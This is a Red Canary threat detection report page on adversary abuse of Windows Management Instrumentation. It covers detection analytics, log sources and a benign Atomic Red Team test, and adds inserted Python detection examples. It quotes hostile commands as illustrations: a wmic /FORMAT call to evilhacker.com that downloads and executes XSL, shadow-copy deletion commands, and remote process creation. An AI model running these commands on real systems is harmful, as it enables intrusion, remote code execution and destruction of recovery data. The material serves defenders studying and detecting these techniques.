URL: https://redcanary.com/threat-detection-report/techniques/windows-management-instrumentation/

T1047


WINDOWS MANAGEMENT INSTRUMENTATION



Windows Management Instrumentation (WMI) held its place as the third most
prevalent threat Red Canary detected last year. Adversaries commonly abuse it to
move laterally, gather information, maintain persistence, and more.





Rank: #3
Percent of customers affected: 12.4%
Total threat volume: 897


THREAT SOUNDS

Because Windows Management Instrumentation (WMI) is a native feature, malicious
activity often blends in with legitimate activity, enabling attacks that could
ultimately bust your Windows.




ANALYSIS


WHY DO ADVERSARIES USE WMI?

Like many of the threats highlighted in this report, WMI is a native Windows
feature that can be used on local or remote systems. Administrators regularly
use WMI to:

 * configure systems
 * execute processes or scripts
 * automate tasks

What makes WMI useful to administrators also makes it attractive to adversaries.
Note that because WMI can carry out these tasks on both local and remote
systems, adversaries can use it for lateral movement. Furthermore, because WMI
is routinely used for benign purposes, malicious activity often blends in with
legitimate activity.


HOW DO ADVERSARIES USE WMI?

Adversaries use WMI to:

 * move laterally
 * gather information
 * modify systems
 * achieve persistence

Before delving deeper into how adversaries use WMI, understand that there are
client and server components that make up WMI. The most recognized clients are
the command-line utility wmic.exe (aka WMIC) and the PowerShell cmdlet
Get-WMIObject. Administrators and adversaries alike use both for the purposes
mentioned above. Because we observe wmic.exe far more often than Get-WMIObject,
the examples provided below will focus on the former. On the server side,
wmiprvse.exe—or the WMI Provider Host—services many, but not all, requests made
by clients. Note that WMIC is not the only client. There are a number of Windows
binaries that make WMI calls under the hood that are handled by
wmiprvse.exe—tasklist.exe is one example.

This is important to remember because if you’re looking at suspicious activity
that ties back to a parent process of wmiprvse.exe, you may be dealing with an
adversary who is using wmic.exe on a remote system to execute payloads on the
system you’re investigating—a form of lateral movement. Here is a WMI lateral
movement technique that we see often:

wmic.exe /node: process call create

On the destination host, the given process will appear as a child of
wmiprvse.exe. If your security audit policies are logging logon events, you
should see a corresponding network (type 3) logon event associated with this
activity. Variations of the above command line may include passed credentials.
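The correlation described above, as an added example that is not part of Red Canary's report: a few constructed Security-log events (a 4624 network logon followed by a 4688 for a child of wmiprvse.exe) and a Python function that ties the WMI-spawned process back to the logon and its source address. The field names are a simplified rendering of the 4624/4688 fields, and joining on user plus time is an assumption of the example; where SubjectLogonId/TargetLogonId are collected, joining on those is stronger.

```python
"""Correlate WMI-spawned child processes with the network logon that preceded them.

Added example, not Red Canary's code. Events are constructed dicts carrying
the Windows Security fields the logic needs (4624 logon, 4688 process
creation); in practice they would be parsed out of EVTX/XML first.
"""
from datetime import datetime, timedelta
import ntpath

# Constructed sample: a type 3 (network) logon from 10.0.0.5, then two
# seconds later WmiPrvSE.exe spawns cmd.exe for the same account. The last
# two events are routine service activity and must not match.
EVENTS = [
    {"id": 4624, "time": "2023-08-31T10:00:01", "host": "WS01",
     "user": "CORP\\jdoe", "logon_type": 3, "src_ip": "10.0.0.5"},
    {"id": 4688, "time": "2023-08-31T10:00:03", "host": "WS01",
     "user": "CORP\\jdoe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c whoami > C:\Windows\Temp\o.txt"},
    {"id": 4624, "time": "2023-08-31T10:04:58", "host": "WS01",
     "user": "CORP\\svc_mon", "logon_type": 5, "src_ip": "-"},
    {"id": 4688, "time": "2023-08-31T10:05:00", "host": "WS01",
     "user": "NT AUTHORITY\\NETWORK SERVICE",
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
]


def _ts(s):
    return datetime.fromisoformat(s)


def _basename(path):
    # ntpath handles Windows paths regardless of the host OS
    return ntpath.basename(path).lower()


def find_remote_wmi_exec(events, window_seconds=60):
    """One finding per process whose parent is wmiprvse.exe and which follows
    a type 3 logon for the same user on the same host within the window.
    The user+host+time join is a heuristic (assumption of this example)."""
    window = timedelta(seconds=window_seconds)
    logons = [e for e in events if e["id"] == 4624 and e["logon_type"] == 3]
    findings = []
    for e in events:
        if e["id"] != 4688 or _basename(e["parent"]) != "wmiprvse.exe":
            continue
        t = _ts(e["time"])
        for l in logons:
            delta = t - _ts(l["time"])
            if (l["host"] == e["host"] and l["user"].lower() == e["user"].lower()
                    and timedelta(0) <= delta <= window):
                findings.append({"host": e["host"], "user": e["user"],
                                 "src_ip": l["src_ip"],
                                 "child": _basename(e["image"]),
                                 "cmdline": e["cmdline"]})
                break
    return findings


if __name__ == "__main__":
    for f in find_remote_wmi_exec(EVENTS):
        print(f"{f['host']}: {f['user']} from {f['src_ip']} ran {f['child']} "
              f"via WMI: {f['cmdline']}")
```

A wmiprvse.exe child with no matching network logon is still worth a look (the operator may already be local), but the pairing above is what turns "odd child of wmiprvse.exe" into "lateral movement from 10.0.0.5".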

Another common way adversaries use WMI, and WMIC specifically, is to gather
information and modify systems. During ransomware attacks, adversaries often
list and delete volume shadows, which are used to recover files. Because
ransomware operators frequently use the Volume Shadow Administration utility,
vssadmin.exe, for this purpose, many organizations send alerts to the SOC when
it executes. However, wmic.exe may also be used to manage volume shadows without
calling vssadmin.exe via a command like the following:

wmic shadowcopy delete /noninteractive

Ironically, we sometimes see a less than stealthy version of this attack using
WMIC:

wmic process call create vssadmin.exe delete shadows /all /quiet

The pattern above will cause wmiprvse.exe to spawn the vssadmin.exe process.

In addition to enumerating and manipulating volume shadows, adversaries use WMIC
to enumerate and modify dozens of aspects of a Windows system or environment.
We’ve seen adversaries use WMIC to:

 * determine what antivirus product may be installed
 * stop the firewall service
 * enumerate group membership (including local and in many configurations,
   domain administrator accounts)
 * modify dozens more items of interest

We’ve also run into adversaries leveraging XSL Script Processing, which can be
used to bypass application control and—courtesy of WMIC’s /format
option—download code from a remote location. Here’s an example of what this can
look like:

wmic os get /FORMAT:"http://evilhacker.com/attacker.xsl"

When the above command is run, it will download and execute the contents of the
XSL file.

Adversaries also use WMI for persistence via the trio of WMI event consumers,
filters, and filter-to-consumer bindings. Adversaries use this persistence
mechanism to execute arbitrary code in response to activity on the endpoint such
as a user logging in or out or a file being written to a specified path.

Regardless of whether it’s a single endpoint, an endpoint in an Active Directory
domain, or an Azure VM, the WMI service will be running and available to
adversaries who have already compromised an endpoint or identity.


ASSOCIATED THREATS

 * CrackMapExec
 * Impacket
 * Mimikatz
 * Dumpert
 * Cobalt Strike



TAKE ACTION

There’s no simple strategy for limiting the effectiveness of adversarial abuse
of WMI. As is often the case with techniques that are common Windows utilities
or processes, the nuclear option of disabling the Winmgmt service is not
recommended because legitimate code often relies upon WMI. Therefore blocking it
would break untold numbers of things in unexpected ways.

WMI namespaces are also securable objects, and while administrators can further
restrict use, remote WMI access requires administrator privileges by default, so
it’s already in a reasonably locked down state. Generally speaking, security
teams should focus on collecting the right kinds of telemetry—AMSI being among
the best sources—and developing methods of reliably detecting WMI abuse rather
than hoping to mitigate WMI abuse altogether.





VISIBILITY

 

Note: The visibility sections in this report are mapped to MITRE ATT&CK data
sources and components.

Our most fruitful detection analytics for catching adversarial abuse of WMI rely
almost entirely on a mix of process and command-line monitoring, which are
widely available via commercial EDR products and native Windows event logging.

PROCESS MONITORING

Processes serve as the basis for most of our WMI detection analytics. Unlike
many other techniques, malicious use of WMI typically manifests as one of two
processes: wmic.exe or wmiprvse.exe. In fact, much of the actual behavior
associated with WMI will spawn from wmiprvse.exe. For example, if an adversary
calls the Create method of the Win32_Process class in order to perform lateral
movement, the executable will spawn as a child process of wmiprvse.exe on the
target system.

A potentially suspicious child process of wmiprvse.exe is scrcons.exe, the
script host executable responsible for executing VBScript and JScript code when
the ActiveScriptEventConsumer class is leveraged for persistence. While it may
be used in limited cases for legitimate purposes, scrcons.exe execution should
be monitored for suspicious child process creation.

COMMAND MONITORING

While we have some analytics that are primarily built around process lineage,
many look for a combination of processes and command-line arguments. Command
lines that invoke the Get-WMIObject PowerShell cmdlet stand out as a
particularly useful indicator of WMI activity.




COLLECTION

 

Note: The collection sections of this report showcase specific log sources from
Windows events, Sysmon, and elsewhere that you can use to collect relevant
security information.

WINDOWS EVENT ID 4688: PROCESS CREATION

As with many other attack techniques, logging process start events (4688) with
command-line logging enabled can be a rich source of telemetry. More abstractly,
Event ID 4688 is a great place—readily available on Windows systems—to observe
WMI and other activity and start differentiating normal and benign from abnormal
and suspicious.

SYSMON EVENT IDS 19, 20, AND 21: WMI EVENTS

Sysmon provides specific WMI event codes (e.g., 19: WmiEventFilter activity
detected, 20: WmiEventConsumer activity detected, and 21:
WmiEventConsumerToFilter activity detected) that are useful for observing
malicious use of WMI. If enabled, Sysmon logs permanent WMI subscriptions in the
Microsoft-Windows-Sysmon/Operational event log using Event IDs 19, 20, and 21
for event filter creation, event consumer creation, and
filter-to-consumer-binding creation, respectively. Legitimate software
occasionally leverages these features of WMI, but they do so infrequently and
are easy to monitor for malicious use.

WINDOWS EVENT ID 5861: MICROSOFT-WINDOWS-WMI-ACTIVITY/OPERATIONAL

Event ID 5861 in the Microsoft-Windows-WMI-Activity/Operational event log
reliably logs permanent WMI event subscriptions. A permanent event subscription
is the primary means by which an adversary can achieve persistence using WMI.
This persistence mechanism offers an adversary a tremendous amount of control
over the conditions in which their payload is executed.
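As an added example (not Red Canary's code), the following Python reconstructs a permanent subscription from Sysmon Event IDs 19, 20 and 21 and lists why it deserves attention. The XML is constructed for the example in the shape Sysmon writes to the event log; the Data field names follow Sysmon's WmiEvent schema, the subscription name "Updater" and its payload are invented, and the keyword heuristics in assess() are the example's own, not a published rule.

```python
"""Reconstruct permanent WMI event subscriptions from Sysmon Event IDs 19/20/21.

Added example, not Red Canary's code. The XML is constructed for this
example in the EVTX shape Sysmon writes; the Data names (EventNamespace,
Name, Query, Type, Destination, Consumer, Filter) follow Sysmon's WmiEvent
schema. The keyword heuristics in assess() are mine, not a published rule.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_XML = r"""<Events>
<Event><System><EventID>19</EventID></System><EventData>
  <Data Name="EventType">WmiFilterEvent</Data>
  <Data Name="Operation">Created</Data>
  <Data Name="User">CORP\admin</Data>
  <Data Name="EventNamespace">root\subscription</Data>
  <Data Name="Name">Updater</Data>
  <Data Name="Query">SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime &gt;= 240 AND TargetInstance.SystemUpTime &lt; 325</Data>
</EventData></Event>
<Event><System><EventID>20</EventID></System><EventData>
  <Data Name="EventType">WmiConsumerEvent</Data>
  <Data Name="Operation">Created</Data>
  <Data Name="User">CORP\admin</Data>
  <Data Name="Name">Updater</Data>
  <Data Name="Type">Command Line</Data>
  <Data Name="Destination">powershell.exe -NoP -W Hidden -Enc SQBFAFgA</Data>
</EventData></Event>
<Event><System><EventID>21</EventID></System><EventData>
  <Data Name="EventType">WmiBindingEvent</Data>
  <Data Name="Operation">Created</Data>
  <Data Name="User">CORP\admin</Data>
  <Data Name="Consumer">CommandLineEventConsumer.Name="Updater"</Data>
  <Data Name="Filter">__EventFilter.Name="Updater"</Data>
</EventData></Event>
</Events>"""


def parse_wmi_events(xml_text):
    """Return one dict per <Event>: its EventID plus every EventData field."""
    events = []
    for ev in ET.fromstring(xml_text).iter("Event"):
        rec = {"EventID": int(ev.findtext("System/EventID"))}
        for d in ev.iter("Data"):
            rec[d.get("Name")] = (d.text or "").strip()
        events.append(rec)
    return events


_NAME = re.compile(r'Name="([^"]+)"')


def reconstruct_subscriptions(events):
    """Join each binding (21) to its filter (19) and consumer (20) by name.
    The binding's Filter/Consumer fields are object paths such as
    __EventFilter.Name="Updater"; only the Name is needed for the join."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    subs = []
    for b in (e for e in events if e["EventID"] == 21):
        fname = _NAME.search(b["Filter"]).group(1)
        cname = _NAME.search(b["Consumer"]).group(1)
        subs.append({"user": b.get("User"), "name": cname,
                     "filter": filters.get(fname), "consumer": consumers.get(cname)})
    return subs


def assess(sub):
    """Return the reasons a reconstructed subscription deserves analyst attention."""
    reasons = []
    c, f = sub["consumer"] or {}, sub["filter"] or {}
    ctype = c.get("Type", "")
    if ctype in ("Command Line", "Active Script"):
        reasons.append(f"{ctype.lower()} consumer")
    dest = c.get("Destination", "").lower()
    if any(k in dest for k in ("powershell", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")):
        reasons.append("script host or LOLBin in consumer destination")
    if re.search(r"-(e|ec|enc|encodedcommand)\b", dest):
        reasons.append("encoded PowerShell command")
    query = f.get("Query", "").lower()
    if "__instancemodificationevent" in query and "systemuptime" in query:
        reasons.append("uptime-triggered filter (fires after every boot)")
    if "win32_logonsession" in query or "win32_logoffsession" in query:
        reasons.append("logon-triggered filter")
    return reasons


if __name__ == "__main__":
    for sub in reconstruct_subscriptions(parse_wmi_events(SAMPLE_XML)):
        print(sub["name"], "created by", sub["user"], "->", assess(sub))
```

The join by name matters: a filter or consumer on its own is ambiguous (vendors create them too), while the binding is what makes the subscription live, so alerting on the reconstructed triple rather than on any single event keeps the signal tight.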

ANTIMALWARE SCAN INTERFACE (AMSI) TELEMETRY

Endpoint security solutions that consume AMSI event data will receive AMSI
events related to WMI tradecraft, including lateral movement attempts and
permanent WMI event subscriptions. AMSI can also be useful for detecting
malicious use of PowerShell’s Get-WMIObject cmdlet.

ENDPOINT DETECTION AND RESPONSE (EDR) TOOLS

A good EDR product will provide detailed visibility into all of the data sources
referenced above and offer great value to security teams seeking to detect
adversaries abusing Windows Management Instrumentation.


DETECTION OPPORTUNITIES

We have more than 96 detection analytics that look for malicious and suspicious
WMI activity. The following detection opportunities are a synthesis of some of
our most effective analytics.

Note: These detection analytics may require tuning.

SUSPICIOUS PROCESS LINEAGE

In general, trusted binaries and known administrative tools and processes will
initiate WMI activity. As such, it makes sense to look for known bad processes
launching WMI or deviations from the expected where a legitimate but unusual
Windows binary spawns WMI—or spawns from it. The following is an amalgamation of
several analytics that can detect a wide array of threats, ranging from red team
activity to web shells to coinminers:

parent_process == wmiprvse.exe
&&
process == ('rundll32.exe' || 'msbuild.exe' || 'powershell.exe' || 'cmd.exe' || 'mshta.exe')

SUSPICIOUS COMMANDS

Looking for suspicious command-line parameters is another solid indicator of
malice. Certain red team and post-exploitation frameworks will spawn unique and
unsigned binaries or commands remotely using the well known process call create
command, and we’ve got a couple different detection methods that have alerted us
to related activity over the years. Potentially suspicious WMI command switches
include create, node:, process, and call. Of course, the maliciousness of these
commands is context-specific, and therefore the following may require tuning
or generate high volumes of false positives:

process == wmic.exe
&&
command_includes ('create' || 'node:' || 'process' || 'call')

UNUSUAL MODULE LOADS

By monitoring and detecting on module loads, you can catch a variety of
different malicious activities, including defense evasion and credential theft.
In cases where an adversary is using WMI for credential theft, consider looking
for the execution of wmiprvse.exe (or its child processes) with unusual module
loads like samlib.dll or vaultcli.dll. WMI is also a useful vehicle for
bypassing application controls, and we commonly see adversaries, real and
simulated, using a WMI bypass method called “Squiblytwo” (wmic.exe’s /format
option pulling an XSL file, as shown in the Analysis section). The following
pseudo-detection analytic is designed specifically to catch application control
bypasses, but you can likely adapt it to detect other threats by substituting in
a different DLL or by removing the command:

process == wmic.exe
&&
command_includes ('format:')
&&
module_load == ('jscript.dll' || 'vbscript.dll') 

OFFICE PRODUCTS SPAWNING WMI

It’s almost always malicious when wmic.exe spawns as a child process of
Microsoft Office and similar products. As such, it makes sense to examine the
chain of execution and follow-on activity when this occurs. The following is a
non-exhaustive example analytic that will catch some of this activity:

parent_process == ('winword.exe' || 'excel.exe')
&&
process == wmic.exe

WMI RECONNAISSANCE

Reconnaissance is harder to detect because it looks very similar to normal admin
behavior. Even so, we detect a relatively high volume of adversaries leveraging
WMI to quickly gather domain information such as users, groups, or computers in
the domain. The following may help you detect related activity:

process == wmic.exe
&&
command_includes ('\ldap' || 'ntdomain')

SHADOW COPY DELETION

It’s not uncommon for ransomware operators to leverage WMI to delete volume
shadows, significantly complicating the process for recovering access to
encrypted systems and files. If you want to detect ransomware using WMI to
delete shadow copies, consider looking for wmic.exe execution with command lines
including shadowcopy or delete.

process == wmic.exe
&&
command_includes ('shadowcopy' && 'delete')

SUSPICIOUS POWERSHELL CMDLETS

There are numerous default PowerShell cmdlets that allow administrators to
leverage WMI via PowerShell. Both adversaries and administrators use these
cmdlets to query the operating system or execute commands, either locally or
remotely. Cmdlets like Get-WMIObject are often used for reconnaissance.

process == powershell.exe
&&
command_includes ('invoke-wmimethod' || 'invoke-cimmethod' || 'get-wmiobject' || 'get-ciminstance' || 'wmiclass')
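The pseudo-analytics in this section, written as runnable Python and exercised against constructed process events. This is an added example, not Red Canary's detection logic: each rule paraphrases one of the analytics above, the paths, command lines and the hypothetical host example.invalid are invented, and loaded modules are assumed to come from EDR or Sysmon Event ID 7 where a rule needs them.

```python
"""The detection opportunities above, expressed as code and run over sample events.

Added example, not Red Canary's analytics. Each rule paraphrases one of the
pseudo-analytics in this section; the events are constructed dicts with the
fields an EDR or Sysmon Event ID 1 record would provide (image, parent,
command line) plus loaded modules where a rule needs them.
"""
import ntpath


def _base(path):
    return ntpath.basename(path).lower()


def rule_suspicious_lineage(e):
    return _base(e["parent"]) == "wmiprvse.exe" and _base(e["image"]) in {
        "rundll32.exe", "msbuild.exe", "powershell.exe", "cmd.exe", "mshta.exe"}


def rule_suspicious_commands(e):
    c = e["cmdline"].lower()
    return _base(e["image"]) == "wmic.exe" and any(
        t in c for t in ("create", "node:", "process", "call"))


def rule_xsl_script_processing(e):  # the "Squiblytwo" application control bypass
    mods = {m.lower() for m in e.get("modules", ())}
    return (_base(e["image"]) == "wmic.exe" and "format:" in e["cmdline"].lower()
            and bool(mods & {"jscript.dll", "vbscript.dll"}))


def rule_office_spawning_wmic(e):
    return _base(e["parent"]) in {"winword.exe", "excel.exe"} and _base(e["image"]) == "wmic.exe"


def rule_wmi_recon(e):
    c = e["cmdline"].lower()
    return _base(e["image"]) == "wmic.exe" and ("\\ldap" in c or "ntdomain" in c)


def rule_shadow_copy_deletion(e):
    c = e["cmdline"].lower()
    return _base(e["image"]) == "wmic.exe" and "shadowcopy" in c and "delete" in c


def rule_wmi_cmdlets(e):
    c = e["cmdline"].lower()
    return _base(e["image"]) == "powershell.exe" and any(k in c for k in (
        "invoke-wmimethod", "invoke-cimmethod", "get-wmiobject", "get-ciminstance", "wmiclass"))


RULES = {
    "suspicious_lineage": rule_suspicious_lineage,
    "suspicious_commands": rule_suspicious_commands,
    "xsl_script_processing": rule_xsl_script_processing,
    "office_spawning_wmic": rule_office_spawning_wmic,
    "wmi_recon": rule_wmi_recon,
    "shadow_copy_deletion": rule_shadow_copy_deletion,
    "wmi_cmdlets": rule_wmi_cmdlets,
}


def evaluate(event):
    """Names of every rule the event matches, sorted for stable output."""
    return sorted(name for name, fn in RULES.items() if fn(event))


WBEM = r"C:\Windows\System32\wbem"
SYS32 = r"C:\Windows\System32"

# Constructed sample events; paths and command lines are invented for the example.
EVENTS = [
    {"parent": WBEM + r"\WmiPrvSE.exe", "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"parent": SYS32 + r"\cmd.exe", "image": WBEM + r"\wmic.exe",
     "cmdline": r'wmic /node:10.0.0.7 /user:corp\admin process call create "cmd.exe /c whoami"'},
    {"parent": SYS32 + r"\cmd.exe", "image": WBEM + r"\wmic.exe",
     "cmdline": 'wmic os get /format:"http://example.invalid/a.xsl"', "modules": ["jscript.dll"]},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": WBEM + r"\wmic.exe", "cmdline": 'wmic process call create "powershell -nop -c iex(...)"'},
    {"parent": SYS32 + r"\cmd.exe", "image": WBEM + r"\wmic.exe",
     "cmdline": r"wmic /namespace:\\root\directory\ldap path ds_group where name='Domain Admins' get ds_member"},
    {"parent": SYS32 + r"\cmd.exe", "image": WBEM + r"\wmic.exe",
     "cmdline": "wmic shadowcopy delete /noninteractive"},
    {"parent": SYS32 + r"\explorer.exe", "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -c "Get-WmiObject Win32_UserAccount"'},
    # Benign: the WMI service host starting its provider process.
    {"parent": SYS32 + r"\svchost.exe", "image": WBEM + r"\WmiPrvSE.exe",
     "cmdline": "wmiprvse.exe -secured -Embedding"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(f"{_base(e['parent'])} -> {_base(e['image'])}: {evaluate(e) or 'no match'}")
```

The suspicious_commands rule is the page's any-of match and is the noisiest of the set; requiring all of process, call and create together, or pairing node: with create, removes most of the benign inventory scripting it would otherwise flag.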


WEEDING OUT FALSE POSITIVES

Network flow logs are of limited use here: WMI traffic on the wire is commonly
encrypted, so it blends in with other network traffic and network-based
detection tends to produce false negatives. This is yet another reason, along
with minimal default logging and limited defender familiarity with WMI, that
adversaries love WMI. Authentication log monitoring for WMI requires deep
knowledge of accounts and typical user activity, which is difficult for most
security teams. Additionally, Windows authentication logs are verbose, noisy,
and not as easy to ingest into a SIEM or similar platform.




TESTING

Start testing your defenses against Windows Management Instrumentation using
Atomic Red Team—an open source testing framework of small, highly portable
detection tests mapped to MITRE ATT&CK.

GETTING STARTED

View atomic tests for T1047: Windows Management Instrumentation. In most
environments, these should be sufficient to generate a useful signal for
defenders.

RUN THIS TEST ON A WINDOWS SYSTEM USING COMMAND PROMPT:

wmic /node:"127.0.0.1" process call create "calc.exe"

USEFUL TELEMETRY WILL INCLUDE:

Visibility: Process monitoring
Telemetry: child processes of wmiprvse.exe
Collection: EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect
relevant telemetry.

Visibility: Command monitoring
Telemetry: "process", "create"
Collection: EDR, Sysmon Event ID 1, and Windows Event ID 4688 should collect
relevant telemetry.

REVIEW AND REPEAT

Now that you have executed one or several common tests and checked for the
expected results, it’s useful to answer some immediate questions:

 * Were any of your actions detected?
 * Were any of your actions blocked or prevented?
 * Were your actions visible in logs or other defensive telemetry?

Repeat this process, performing additional tests related to this technique. You
can also create and contribute tests of your own.

 


© 2014-2023 Red Canary. All rights reserved. info@redcanary.com +1 855-977-0686